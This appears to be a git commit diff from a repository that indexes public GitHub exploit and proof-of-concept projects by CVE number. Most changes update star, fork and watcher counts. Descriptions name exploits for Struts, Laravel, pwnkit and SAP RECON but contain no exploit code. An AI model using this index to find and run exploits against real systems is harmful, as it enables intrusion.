2024/CVE-2024-40617.json create mode 100644 2024/CVE-2024-40658.json create mode 100644 2024/CVE-2024-40662.json create mode 100644 2024/CVE-2024-40673.json create mode 100644 2024/CVE-2024-40675.json create mode 100644 2024/CVE-2024-40676.json create mode 100644 2024/CVE-2024-40711.json create mode 100644 2024/CVE-2024-40725.json create mode 100644 2024/CVE-2024-40892.json create mode 100644 2024/CVE-2024-41107.json create mode 100644 2024/CVE-2024-41110.json create mode 100644 2024/CVE-2024-41276.json create mode 100644 2024/CVE-2024-41290.json create mode 100644 2024/CVE-2024-41301.json create mode 100644 2024/CVE-2024-41302.json create mode 100644 2024/CVE-2024-41312.json create mode 100644 2024/CVE-2024-41319.json create mode 100644 2024/CVE-2024-41570.json create mode 100644 2024/CVE-2024-41628.json create mode 100644 2024/CVE-2024-41640.json create mode 100644 2024/CVE-2024-41651.json create mode 100644 2024/CVE-2024-41662.json create mode 100644 2024/CVE-2024-41713.json create mode 100644 2024/CVE-2024-41958.json create mode 100644 2024/CVE-2024-41992.json create mode 100644 2024/CVE-2024-4231.json create mode 100644 2024/CVE-2024-4232.json create mode 100644 2024/CVE-2024-42327.json create mode 100644 2024/CVE-2024-42346.json create mode 100644 2024/CVE-2024-42448.json create mode 100644 2024/CVE-2024-42461.json create mode 100644 2024/CVE-2024-42640.json create mode 100644 2024/CVE-2024-42642.json create mode 100644 2024/CVE-2024-42657.json create mode 100644 2024/CVE-2024-42658.json create mode 100644 2024/CVE-2024-42758.json create mode 100644 2024/CVE-2024-42834.json create mode 100644 2024/CVE-2024-42845.json create mode 100644 2024/CVE-2024-42849.json create mode 100644 2024/CVE-2024-42850.json create mode 100644 2024/CVE-2024-42861.json create mode 100644 2024/CVE-2024-42919.json create mode 100644 2024/CVE-2024-4295.json create mode 100644 2024/CVE-2024-42992.json create mode 100644 2024/CVE-2024-43035.json create mode 100644 2024/CVE-2024-43044.json create mode 100644 2024/CVE-2024-43160.json create mode 100644 2024/CVE-2024-4320.json create mode 100644 2024/CVE-2024-4323.json create mode 100644 2024/CVE-2024-43363.json create mode 100644 2024/CVE-2024-43416.json create mode 100644 2024/CVE-2024-43425.json create mode 100644 2024/CVE-2024-4351.json create mode 100644 2024/CVE-2024-4352.json create mode 100644 2024/CVE-2024-43532.json create mode 100644 2024/CVE-2024-4358.json create mode 100644 2024/CVE-2024-436.json create mode 100644 2024/CVE-2024-4367.json create mode 100644 2024/CVE-2024-43917.json create mode 100644 2024/CVE-2024-43918.json create mode 100644 2024/CVE-2024-43919.json create mode 100644 2024/CVE-2024-43965.json create mode 100644 2024/CVE-2024-43998.json create mode 100644 2024/CVE-2024-44000.json create mode 100644 2024/CVE-2024-4406.json create mode 100644 2024/CVE-2024-44083.json create mode 100644 2024/CVE-2024-44193.json create mode 100644 2024/CVE-2024-44258.json create mode 100644 2024/CVE-2024-44285.json create mode 100644 2024/CVE-2024-44337.json create mode 100644 2024/CVE-2024-44346.json create mode 100644 2024/CVE-2024-44349.json create mode 100644 2024/CVE-2024-4439.json create mode 100644 2024/CVE-2024-4443.json create mode 100644 2024/CVE-2024-44450.json create mode 100644 2024/CVE-2024-44541.json create mode 100644 2024/CVE-2024-44542.json create mode 100644 2024/CVE-2024-44610.json create mode 100644 2024/CVE-2024-44623.json create mode 100644 2024/CVE-2024-44625.json create mode 100644 2024/CVE-2024-44765.json create mode 100644 2024/CVE-2024-44812.json create mode 100644 2024/CVE-2024-44815.json create mode 100644 2024/CVE-2024-44849.json create mode 100644 2024/CVE-2024-44867.json create mode 100644 2024/CVE-2024-44902.json create mode 100644 2024/CVE-2024-44946.json create mode 100644 2024/CVE-2024-44947.json create mode 100644 2024/CVE-2024-45058.json create mode 100644 2024/CVE-2024-45200.json create mode 100644 2024/CVE-2024-45216.json create mode 100644 2024/CVE-2024-45241.json create mode 100644 2024/CVE-2024-45244.json create mode 100644 2024/CVE-2024-45264.json create mode 100644 2024/CVE-2024-45265.json create mode 100644 2024/CVE-2024-45337.json create mode 100644 2024/CVE-2024-45383.json create mode 100644 2024/CVE-2024-45409.json create mode 100644 2024/CVE-2024-45410.json create mode 100644 2024/CVE-2024-45436.json create mode 100644 2024/CVE-2024-45440.json create mode 100644 2024/CVE-2024-45492.json create mode 100644 2024/CVE-2024-45507.json create mode 100644 2024/CVE-2024-45519.json create mode 100644 2024/CVE-2024-45589.json create mode 100644 2024/CVE-2024-45614.json create mode 100644 2024/CVE-2024-4573.json create mode 100644 2024/CVE-2024-4577.json create mode 100644 2024/CVE-2024-46209.json create mode 100644 2024/CVE-2024-46256.json create mode 100644 2024/CVE-2024-46278.json create mode 100644 2024/CVE-2024-46310.json create mode 100644 2024/CVE-2024-46377.json create mode 100644 2024/CVE-2024-46383.json create mode 100644 2024/CVE-2024-46451.json create mode 100644 2024/CVE-2024-46483.json create mode 100644 2024/CVE-2024-46532.json create mode 100644 2024/CVE-2024-46538.json create mode 100644 2024/CVE-2024-46542.json create mode 100644 2024/CVE-2024-46627.json create mode 100644 2024/CVE-2024-46635.json create mode 100644 2024/CVE-2024-46658.json create mode 100644 2024/CVE-2024-46901.json create mode 100644 2024/CVE-2024-46982.json create mode 100644 2024/CVE-2024-46986.json create mode 100644 2024/CVE-2024-4701.json create mode 100644 2024/CVE-2024-47062.json create mode 100644 2024/CVE-2024-47066.json create mode 100644 2024/CVE-2024-47076.json create mode 100644 2024/CVE-2024-47138.json create mode 100644 2024/CVE-2024-47176.json create mode 100644 2024/CVE-2024-47177.json create mode 100644 2024/CVE-2024-47575.json create mode 100644 2024/CVE-2024-4761.json create mode 100644 2024/CVE-2024-47854.json create mode 100644 2024/CVE-2024-48197.json create mode 100644 2024/CVE-2024-48208.json create mode 100644 2024/CVE-2024-48217.json create mode 100644 2024/CVE-2024-48245.json create mode 100644 2024/CVE-2024-48246.json create mode 100644 2024/CVE-2024-48322.json create mode 100644 2024/CVE-2024-48325.json create mode 100644 2024/CVE-2024-48326.json create mode 100644 2024/CVE-2024-48336.json create mode 100644 2024/CVE-2024-48359.json create mode 100644 2024/CVE-2024-48360.json create mode 100644 2024/CVE-2024-48392.json create mode 100644 2024/CVE-2024-48415.json create mode 100644 2024/CVE-2024-48427.json create mode 100644 2024/CVE-2024-48569.json create mode 100644 2024/CVE-2024-48605.json create mode 100644 2024/CVE-2024-48644.json create mode 100644 2024/CVE-2024-48652.json create mode 100644 2024/CVE-2024-48705.json create mode 100644 2024/CVE-2024-4875.json create mode 100644 2024/CVE-2024-48762.json create mode 100644 2024/CVE-2024-4879.json create mode 100644 2024/CVE-2024-4883.json create mode 100644 2024/CVE-2024-4885.json create mode 100644 2024/CVE-2024-48914.json create mode 100644 2024/CVE-2024-48955.json create mode 100644 2024/CVE-2024-4898.json create mode 100644 2024/CVE-2024-48990.json create mode 100644 2024/CVE-2024-49039.json create mode 100644 2024/CVE-2024-49112.json create mode 100644 2024/CVE-2024-49113.json create mode 100644 2024/CVE-2024-49117.json create mode 100644 2024/CVE-2024-49203.json create mode 100644 2024/CVE-2024-49328.json create mode 100644 2024/CVE-2024-49368.json create mode 100644 2024/CVE-2024-49369.json create mode 100644 2024/CVE-2024-49379.json create mode 100644 2024/CVE-2024-4956.json create mode 100644 2024/CVE-2024-49607.json create mode 100644 2024/CVE-2024-49681.json create mode 100644 2024/CVE-2024-5009.json create mode 100644 2024/CVE-2024-50251.json create mode 100644 2024/CVE-2024-50335.json create mode 100644 2024/CVE-2024-50340.json create mode 100644 2024/CVE-2024-50379.json create mode 100644 2024/CVE-2024-50395.json create mode 100644 2024/CVE-2024-50427.json create mode 100644 2024/CVE-2024-50450.json create mode 100644 2024/CVE-2024-50473.json create mode 100644 2024/CVE-2024-50475.json create mode 100644 2024/CVE-2024-50476.json create mode 100644 2024/CVE-2024-50477.json create mode 100644 2024/CVE-2024-50478.json create mode 100644 2024/CVE-2024-50482.json create mode 100644 2024/CVE-2024-50483.json create mode 100644 2024/CVE-2024-50485.json create mode 100644 2024/CVE-2024-50488.json create mode 100644 2024/CVE-2024-50490.json create mode 100644 2024/CVE-2024-50493.json create mode 100644 2024/CVE-2024-50498.json create mode 100644 2024/CVE-2024-50507.json create mode 100644 2024/CVE-2024-50508.json create mode 100644 2024/CVE-2024-50509.json create mode 100644 2024/CVE-2024-50510.json create mode 100644 2024/CVE-2024-50623.json create mode 100644 2024/CVE-2024-50657.json create mode 100644 2024/CVE-2024-50677.json create mode 100644 2024/CVE-2024-50803.json create mode 100644 2024/CVE-2024-50804.json create mode 100644 2024/CVE-2024-5084.json create mode 100644 2024/CVE-2024-50848.json create mode 100644 2024/CVE-2024-50849.json create mode 100644 2024/CVE-2024-50944.json create mode 100644 2024/CVE-2024-50945.json create mode 100644 2024/CVE-2024-50961.json create mode 100644 2024/CVE-2024-50962.json create mode 100644 2024/CVE-2024-50964.json create mode 100644 2024/CVE-2024-50968.json create mode 100644 2024/CVE-2024-50969.json create mode 100644 2024/CVE-2024-50970.json create mode 100644 2024/CVE-2024-50971.json create mode 100644 2024/CVE-2024-50972.json create mode 100644 2024/CVE-2024-50986.json create mode 100644 2024/CVE-2024-51026.json create mode 100644 2024/CVE-2024-51030.json create mode 100644 2024/CVE-2024-51031.json create mode 100644 2024/CVE-2024-51032.json create mode 100644 2024/CVE-2024-51132.json create mode 100644 2024/CVE-2024-51179.json create mode 100644 2024/CVE-2024-5124.json create mode 100644 2024/CVE-2024-51358.json create mode 100644 2024/CVE-2024-51378.json create mode 100644 2024/CVE-2024-51430.json create mode 100644 2024/CVE-2024-51435.json create mode 100644 2024/CVE-2024-51442.json create mode 100644 2024/CVE-2024-51567.json create mode 100644 2024/CVE-2024-51665.json create mode 100644 2024/CVE-2024-51747.json create mode 100644 2024/CVE-2024-52002.json create mode 100644 2024/CVE-2024-52301.json create mode 100644 2024/CVE-2024-52302.json create mode 100644 2024/CVE-2024-52316.json create mode 100644 2024/CVE-2024-52317.json create mode 100644 2024/CVE-2024-52318.json create mode 100644 2024/CVE-2024-52335.json create mode 100644 2024/CVE-2024-52380.json create mode 100644 2024/CVE-2024-52382.json create mode 100644 2024/CVE-2024-52429.json create mode 100644 2024/CVE-2024-52430.json create mode 100644 2024/CVE-2024-52433.json create mode 100644 2024/CVE-2024-5246.json create mode 100644 2024/CVE-2024-52475.json create mode 100644 2024/CVE-2024-52711.json create mode 100644 2024/CVE-2024-5274.json create mode 100644 2024/CVE-2024-52800.json create mode 100644 2024/CVE-2024-52940.json create mode 100644 2024/CVE-2024-5324.json create mode 100644 2024/CVE-2024-53255.json create mode 100644 2024/CVE-2024-53259.json create mode 100644 2024/CVE-2024-5326.json create mode 100644 2024/CVE-2024-53345.json create mode 100644 2024/CVE-2024-53375.json create mode 100644 2024/CVE-2024-53376.json create mode 100644 2024/CVE-2024-53476.json create mode 100644 2024/CVE-2024-53522.json create mode 100644 2024/CVE-2024-5356.json create mode 100644 2024/CVE-2024-53617.json create mode 100644 2024/CVE-2024-53677.json create mode 100644 2024/CVE-2024-54152.json create mode 100644 2024/CVE-2024-5420.json create mode 100644 2024/CVE-2024-54262.json create mode 100644 2024/CVE-2024-54330.json create mode 100644 2024/CVE-2024-54363.json create mode 100644 2024/CVE-2024-54369.json create mode 100644 2024/CVE-2024-54374.json create mode 100644 2024/CVE-2024-54378.json create mode 100644 2024/CVE-2024-54385.json create mode 100644 2024/CVE-2024-5452.json create mode 100644 2024/CVE-2024-54679.json create mode 100644 2024/CVE-2024-54819.json create mode 100644 2024/CVE-2024-54910.json create mode 100644 2024/CVE-2024-55099.json create mode 100644 2024/CVE-2024-5522.json create mode 100644 2024/CVE-2024-55457.json create mode 100644 2024/CVE-2024-55557.json create mode 100644 2024/CVE-2024-55587.json create mode 100644 2024/CVE-2024-55875.json create mode 100644 2024/CVE-2024-55968.json create mode 100644 2024/CVE-2024-55972.json create mode 100644 2024/CVE-2024-55976.json create mode 100644 2024/CVE-2024-55978.json create mode 100644 2024/CVE-2024-55980.json create mode 100644 2024/CVE-2024-55981.json create mode 100644 2024/CVE-2024-55982.json create mode 100644 2024/CVE-2024-55988.json create mode 100644 2024/CVE-2024-56115.json create mode 100644 2024/CVE-2024-56116.json create mode 100644 2024/CVE-2024-56145.json create mode 100644 2024/CVE-2024-5633.json create mode 100644 2024/CVE-2024-56331.json create mode 100644 2024/CVE-2024-56431.json create mode 100644 2024/CVE-2024-56433.json create mode 100644 2024/CVE-2024-56512.json create mode 100644 2024/CVE-2024-5735.json create mode 100644 2024/CVE-2024-5736.json create mode 100644 2024/CVE-2024-5737.json create mode 100644 2024/CVE-2024-5764.json create mode 100644 2024/CVE-2024-5806.json create mode 100644 2024/CVE-2024-5910.json create mode 100644 2024/CVE-2024-5932.json create mode 100644 2024/CVE-2024-5947.json create mode 100644 2024/CVE-2024-5961.json create mode 100644 2024/CVE-2024-6028.json create mode 100644 2024/CVE-2024-6043.json create mode 100644 2024/CVE-2024-6050.json create mode 100644 2024/CVE-2024-6095.json create mode 100644 2024/CVE-2024-6205.json create mode 100644 2024/CVE-2024-6222.json create mode 100644 2024/CVE-2024-6330.json create mode 100644 2024/CVE-2024-6366.json create mode 100644 2024/CVE-2024-6386.json create mode 100644 2024/CVE-2024-6387.json create mode 100644 2024/CVE-2024-6473.json create mode 100644 2024/CVE-2024-6529.json create mode 100644 2024/CVE-2024-6536.json create mode 100644 2024/CVE-2024-6592.json create mode 100644 2024/CVE-2024-6624.json create mode 100644 2024/CVE-2024-6670.json create mode 100644 2024/CVE-2024-6768.json create mode 100644 2024/CVE-2024-6769.json create mode 100644 2024/CVE-2024-6778.json create mode 100644 2024/CVE-2024-6782.json create mode 100644 2024/CVE-2024-7029.json create mode 100644 2024/CVE-2024-7094.json create mode 100644 2024/CVE-2024-7120.json create mode 100644 2024/CVE-2024-7124.json create mode 100644 2024/CVE-2024-7135.json create mode 100644 2024/CVE-2024-7313.json create mode 100644 2024/CVE-2024-7339.json create mode 100644 2024/CVE-2024-7456.json create mode 100644 2024/CVE-2024-7479.json create mode 100644 2024/CVE-2024-7514.json create mode 100644 2024/CVE-2024-7593.json create mode 100644 2024/CVE-2024-7646.json create mode 100644 2024/CVE-2024-7703.json create mode 100644 2024/CVE-2024-7808.json create mode 100644 2024/CVE-2024-7854.json create mode 100644 2024/CVE-2024-7856.json create mode 100644 2024/CVE-2024-7928.json create mode 100644 2024/CVE-2024-7954.json create mode 100644 2024/CVE-2024-7965.json create mode 100644 2024/CVE-2024-8069.json create mode 100644 2024/CVE-2024-8190.json create mode 100644 2024/CVE-2024-8275.json create mode 100644 2024/CVE-2024-8277.json create mode 100644 2024/CVE-2024-8309.json create mode 100644 2024/CVE-2024-8349.json create mode 100644 2024/CVE-2024-8353.json create mode 100644 2024/CVE-2024-8484.json create mode 100644 2024/CVE-2024-8504.json create mode 100644 2024/CVE-2024-8517.json create mode 100644 2024/CVE-2024-8522.json create mode 100644 2024/CVE-2024-8529.json create mode 100644 2024/CVE-2024-8672.json create mode 100644 2024/CVE-2024-8698.json create mode 100644 2024/CVE-2024-8752.json create mode 100644 2024/CVE-2024-8856.json create mode 100644 2024/CVE-2024-8868.json create mode 100644 2024/CVE-2024-8949.json create mode 100644 2024/CVE-2024-8963.json create mode 100644 2024/CVE-2024-9014.json create mode 100644 2024/CVE-2024-9047.json create mode 100644 2024/CVE-2024-9061.json create mode 100644 2024/CVE-2024-9106.json create mode 100644 2024/CVE-2024-9162.json create mode 100644 2024/CVE-2024-9166.json create mode 100644 2024/CVE-2024-9224.json create mode 100644 2024/CVE-2024-9234.json create mode 100644 2024/CVE-2024-9264.json create mode 100644 2024/CVE-2024-9290.json create mode 100644 2024/CVE-2024-9326.json create mode 100644 2024/CVE-2024-9441.json create mode 100644 2024/CVE-2024-9464.json create mode 100644 2024/CVE-2024-9465.json create mode 100644 2024/CVE-2024-9466.json create mode 100644 2024/CVE-2024-9474.json create mode 100644 2024/CVE-2024-9570.json create mode 100644 2024/CVE-2024-9593.json create mode 100644 2024/CVE-2024-9680.json create mode 100644 2024/CVE-2024-9707.json create mode 100644 2024/CVE-2024-9796.json create mode 100644 2024/CVE-2024-9821.json create mode 100644 2024/CVE-2024-9822.json create mode 100644 2024/CVE-2024-9890.json create mode 100644 2024/CVE-2024-9926.json create mode 100644 2024/CVE-2024-9932.json create mode 100644 2024/CVE-2024-9933.json create mode 100644 2024/CVE-2024-9935.json create mode 100644 2024/CVE-2024-9955.json diff --git a/2014/CVE-2014-4210.json b/2014/CVE-2014-4210.json index a845a2076b..e49fa713cc 100644 --- a/2014/CVE-2014-4210.json +++ b/2014/CVE-2014-4210.json @@ -45,10 +45,10 @@ "description": "weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14750、CVE-2020-14882、CVE-2020-14883", "fork": false, "created_at": "2020-01-15T04:26:29Z", - "updated_at": "2025-01-04T06:15:01Z", + "updated_at": "2025-01-07T22:35:05Z", "pushed_at": "2023-11-24T09:21:56Z", - "stargazers_count": 2014, - "watchers_count": 2014, + "stargazers_count": 2013, + "watchers_count": 2013, "has_discussions": true, "forks_count": 340, "allow_forking": true, @@ -78,7 +78,7 @@ ], "visibility": "public", "forks": 340, - "watchers": 2014, + "watchers": 2013, "score": 0, "subscribers_count": 38 }, diff --git a/2015/CVE-2015-6639.json b/2015/CVE-2015-6639.json index 10739c4397..63b67c1b31 100644 --- a/2015/CVE-2015-6639.json +++ b/2015/CVE-2015-6639.json @@ -19,13 +19,13 @@ "stargazers_count": 117, "watchers_count": 117, "has_discussions": false, - "forks_count": 50, + "forks_count": 51, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", - "forks": 50, + "forks": 51, "watchers": 117, "score": 0, "subscribers_count": 12 @@ -50,13 +50,13 @@ "stargazers_count": 341, "watchers_count": 341, "has_discussions": false, - "forks_count": 109, + "forks_count": 110, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", - "forks": 109, + "forks": 110, "watchers": 341, "score": 0, "subscribers_count": 48 diff --git a/2016/CVE-2016-0638.json b/2016/CVE-2016-0638.json index 4af4c337db..2fc98d1720 100644 --- a/2016/CVE-2016-0638.json +++ b/2016/CVE-2016-0638.json @@ -14,10 +14,10 @@ "description": "weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14750、CVE-2020-14882、CVE-2020-14883", "fork": false, "created_at": "2020-01-15T04:26:29Z", - "updated_at": "2025-01-04T06:15:01Z", + "updated_at": "2025-01-07T22:35:05Z", "pushed_at": "2023-11-24T09:21:56Z", - "stargazers_count": 2014, - "watchers_count": 2014, + "stargazers_count": 2013, + "watchers_count": 2013, "has_discussions": true, "forks_count": 340, "allow_forking": true, @@ -47,7 +47,7 @@ ], "visibility": "public", "forks": 340, - "watchers": 2014, + "watchers": 2013, "score": 0, "subscribers_count": 38 }, diff --git a/2016/CVE-2016-2431.json b/2016/CVE-2016-2431.json index d96761da58..458eb8e948 100644 --- a/2016/CVE-2016-2431.json +++ b/2016/CVE-2016-2431.json @@ -50,13 +50,13 @@ "stargazers_count": 341, "watchers_count": 341, "has_discussions": false, - "forks_count": 109, + "forks_count": 110, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", - "forks": 109, + "forks": 110, "watchers": 341, "score": 0, "subscribers_count": 48 diff --git a/2017/CVE-2017-3248.json b/2017/CVE-2017-3248.json index f4b52232e5..6859338d05 100644 --- a/2017/CVE-2017-3248.json +++ b/2017/CVE-2017-3248.json @@ -45,10 +45,10 @@ "description": "weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14750、CVE-2020-14882、CVE-2020-14883", "fork": false, "created_at": "2020-01-15T04:26:29Z", - "updated_at": "2025-01-04T06:15:01Z", + "updated_at": "2025-01-07T22:35:05Z", "pushed_at": "2023-11-24T09:21:56Z", - "stargazers_count": 2014, - "watchers_count": 2014, + "stargazers_count": 2013, + "watchers_count": 2013, "has_discussions": true, "forks_count": 340, "allow_forking": true, @@ -78,7 +78,7 @@ ], "visibility": "public", "forks": 340, - "watchers": 2014, + "watchers": 2013, "score": 0, "subscribers_count": 38 }, diff --git a/2017/CVE-2017-5638.json b/2017/CVE-2017-5638.json index 192450b8f0..26d043dc1b 100644 --- a/2017/CVE-2017-5638.json +++ b/2017/CVE-2017-5638.json @@ -429,10 +429,10 @@ "description": "An exploit for Apache Struts CVE-2017-5638", "fork": false, "created_at": "2017-03-12T02:02:25Z", - "updated_at": "2024-12-29T01:33:10Z", + "updated_at": "2025-01-07T21:31:09Z", "pushed_at": "2018-05-21T18:33:26Z", - "stargazers_count": 428, - "watchers_count": 428, + "stargazers_count": 429, + "watchers_count": 429, "has_discussions": false, "forks_count": 135, "allow_forking": true, @@ -447,7 +447,7 @@ ], "visibility": "public", "forks": 135, - "watchers": 428, + "watchers": 429, "score": 0, "subscribers_count": 22 }, diff --git a/2018/CVE-2018-2628.json b/2018/CVE-2018-2628.json index b999a291d6..d01b1464d1 100644 --- a/2018/CVE-2018-2628.json +++ b/2018/CVE-2018-2628.json @@ -576,10 +576,10 @@ "description": "weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14750、CVE-2020-14882、CVE-2020-14883", "fork": false, "created_at": "2020-01-15T04:26:29Z", - "updated_at": "2025-01-04T06:15:01Z", + "updated_at": "2025-01-07T22:35:05Z", "pushed_at": "2023-11-24T09:21:56Z", - "stargazers_count": 2014, - "watchers_count": 2014, + "stargazers_count": 2013, + "watchers_count": 2013, "has_discussions": true, "forks_count": 340, "allow_forking": true, @@ -609,7 +609,7 @@ ], "visibility": "public", "forks": 340, - "watchers": 2014, + "watchers": 2013, "score": 0, "subscribers_count": 38 }, diff --git a/2019/CVE-2019-2618.json b/2019/CVE-2019-2618.json index b82189d01b..9b43006e61 100644 --- a/2019/CVE-2019-2618.json +++ b/2019/CVE-2019-2618.json @@ -200,10 +200,10 @@ "description": "weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14750、CVE-2020-14882、CVE-2020-14883", "fork": false, "created_at": "2020-01-15T04:26:29Z", - "updated_at": "2025-01-04T06:15:01Z", + "updated_at": "2025-01-07T22:35:05Z", "pushed_at": "2023-11-24T09:21:56Z", - "stargazers_count": 2014, - "watchers_count": 2014, + "stargazers_count": 2013, + "watchers_count": 2013, "has_discussions": true, "forks_count": 340, "allow_forking": true, @@ -233,7 +233,7 @@ ], "visibility": "public", "forks": 340, - "watchers": 2014, + "watchers": 2013, "score": 0, "subscribers_count": 38 } diff --git a/2020/CVE-2020-2551.json b/2020/CVE-2020-2551.json index 7bece2e29e..13ab21d7ee 100644 --- a/2020/CVE-2020-2551.json +++ b/2020/CVE-2020-2551.json @@ -14,10 +14,10 @@ "description": "weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14750、CVE-2020-14882、CVE-2020-14883", "fork": false, "created_at": "2020-01-15T04:26:29Z", - "updated_at": "2025-01-04T06:15:01Z", + "updated_at": "2025-01-07T22:35:05Z", "pushed_at": "2023-11-24T09:21:56Z", - "stargazers_count": 2014, - "watchers_count": 2014, + "stargazers_count": 2013, + "watchers_count": 2013, "has_discussions": true, "forks_count": 340, "allow_forking": true, @@ -47,7 +47,7 @@ ], "visibility": "public", "forks": 340, - "watchers": 2014, + "watchers": 2013, "score": 0, "subscribers_count": 38 }, diff --git a/2020/CVE-2020-35489.json b/2020/CVE-2020-35489.json index e6d860c84f..98d46d1512 100644 --- a/2020/CVE-2020-35489.json +++ b/2020/CVE-2020-35489.json @@ -174,6 +174,6 @@ "forks": 0, "watchers": 0, "score": 0, - "subscribers_count": 0 + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2020/CVE-2020-6287.json b/2020/CVE-2020-6287.json index 406a6d57a7..d0de99afbe 100644 --- a/2020/CVE-2020-6287.json +++ b/2020/CVE-2020-6287.json @@ -14,10 +14,10 @@ "description": "PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)", "fork": false, "created_at": "2020-07-15T15:20:09Z", - "updated_at": "2024-11-28T05:56:23Z", + "updated_at": "2025-01-07T22:34:48Z", "pushed_at": "2020-09-29T17:20:12Z", - "stargazers_count": 216, - "watchers_count": 216, + "stargazers_count": 215, + "watchers_count": 215, "has_discussions": false, "forks_count": 64, "allow_forking": true, @@ -26,7 +26,7 @@ "topics": [], "visibility": "public", "forks": 64, - "watchers": 216, + "watchers": 215, "score": 0, "subscribers_count": 14 }, diff --git a/2020/CVE-2020-8840.json b/2020/CVE-2020-8840.json index 5ffef1bb3a..b7d3a66b46 100644 --- a/2020/CVE-2020-8840.json +++ b/2020/CVE-2020-8840.json @@ -152,7 +152,7 @@ "forks": 4, "watchers": 5, "score": 0, - "subscribers_count": 2 + "subscribers_count": 0 }, { "id": 333189009, diff --git a/2021/CVE-2021-3129.json b/2021/CVE-2021-3129.json index bd50188a60..85d744a634 100644 --- a/2021/CVE-2021-3129.json +++ b/2021/CVE-2021-3129.json @@ -359,10 +359,10 @@ "description": "Laravel RCE Exploit Script - CVE-2021-3129", "fork": false, "created_at": "2022-04-16T17:22:55Z", - "updated_at": "2025-01-03T06:35:31Z", + "updated_at": "2025-01-07T22:35:15Z", "pushed_at": "2024-09-22T13:10:27Z", - "stargazers_count": 97, - "watchers_count": 97, + "stargazers_count": 98, + "watchers_count": 98, "has_discussions": false, "forks_count": 20, "allow_forking": true, @@ -386,7 +386,7 @@ ], "visibility": "public", "forks": 20, - "watchers": 97, + "watchers": 98, "score": 0, "subscribers_count": 1 }, diff --git a/2021/CVE-2021-39685.json b/2021/CVE-2021-39685.json index 548fd364bc..2a69506b05 100644 --- a/2021/CVE-2021-39685.json +++ b/2021/CVE-2021-39685.json @@ -14,10 +14,10 @@ "description": "CVE-2021-39685 Description and sample exploit for Linux USB Gadget overflow vulnerability", "fork": false, "created_at": "2021-12-15T14:28:00Z", - "updated_at": "2024-11-16T10:28:23Z", + "updated_at": "2025-01-07T20:45:55Z", "pushed_at": "2022-04-28T10:15:24Z", - "stargazers_count": 10, - "watchers_count": 10, + "stargazers_count": 11, + "watchers_count": 11, "has_discussions": false, "forks_count": 0, "allow_forking": true, @@ -26,7 +26,7 @@ "topics": [], "visibility": "public", "forks": 0, - "watchers": 10, + "watchers": 11, "score": 0, "subscribers_count": 3 } diff --git a/2021/CVE-2021-4034.json b/2021/CVE-2021-4034.json index ada85da325..c6e9bb3666 100644 --- a/2021/CVE-2021-4034.json +++ b/2021/CVE-2021-4034.json @@ -1346,10 +1346,10 @@ "description": "Python exploit code for CVE-2021-4034 (pwnkit)", "fork": false, "created_at": "2022-01-26T17:53:16Z", - "updated_at": "2025-01-04T14:02:51Z", + "updated_at": "2025-01-07T23:41:34Z", "pushed_at": "2022-01-28T00:29:15Z", - "stargazers_count": 157, - "watchers_count": 157, + "stargazers_count": 158, + "watchers_count": 158, "has_discussions": false, "forks_count": 37, "allow_forking": true, @@ -1358,7 +1358,7 @@ "topics": [], "visibility": "public", "forks": 37, - "watchers": 157, + "watchers": 158, "score": 0, "subscribers_count": 2 }, diff --git a/2021/CVE-2021-41773.json b/2021/CVE-2021-41773.json index ae5795ffcf..074cd829c8 100644 --- a/2021/CVE-2021-41773.json +++ b/2021/CVE-2021-41773.json @@ -3777,6 +3777,6 @@ "forks": 0, "watchers": 0, "score": 0, - "subscribers_count": 0 + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2021/CVE-2021-41805.json b/2021/CVE-2021-41805.json index 743e3436b6..7501420615 100644 --- a/2021/CVE-2021-41805.json +++ b/2021/CVE-2021-41805.json @@ -29,5 +29,36 @@ "watchers": 1, "score": 0, "subscribers_count": 1 + }, + { + "id": 913550439, 